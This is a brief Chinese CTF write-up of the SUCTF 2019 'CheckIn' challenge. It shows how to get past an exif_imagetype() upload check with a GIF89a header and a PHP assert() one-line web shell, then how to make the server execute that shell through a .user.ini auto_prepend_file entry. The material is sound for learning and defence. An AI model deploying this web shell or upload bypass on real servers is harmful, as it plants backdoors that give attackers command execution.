[SUCTF 2019]CheckIn 1
阿新 • • 發佈:2021-10-17
1.發現
1.開啟題目地址發現為檔案上傳,隨便上傳JPG/PHP/TXT檔案。
2.發現PHP檔案上傳不去,並發現exif_imagetype()函式
函式功能是讀取一個影象的第一個位元組並檢查其簽名。 在一句話前面加個GIF89a進行繞過
那麼現在的一句話如下,可以製作成圖片馬,但是需要解析成php
GIF89a <script language='php'>assert($_REQUEST['cmd'])</script>
正常想到的是.htaccess,但是這個伺服器是nginx,而.htaccess是針對apache的
知識點
1)exif_imagetype()函式: PHP: exif_imagetype - Manual
2.步驟
思路:上傳圖片馬,然後利用.user.ini解析圖片馬生成webshell
知識點
1).user.ini檔案構成的PHP後門:.user.ini檔案構成的PHP後門 - phith0n (wooyun.js.org)
1.生成圖片馬
2.生產.user.ini檔案
GIF89a auto_prepend_file=shell.jpg
3.上傳.user.ini和圖片馬
4.然後根據上傳的路徑,找到上傳的Webshell,獲取flag。
3.參考
[SUCTF 2019]CheckIn - 高諾琪 - 部落格園 (cnblogs.com)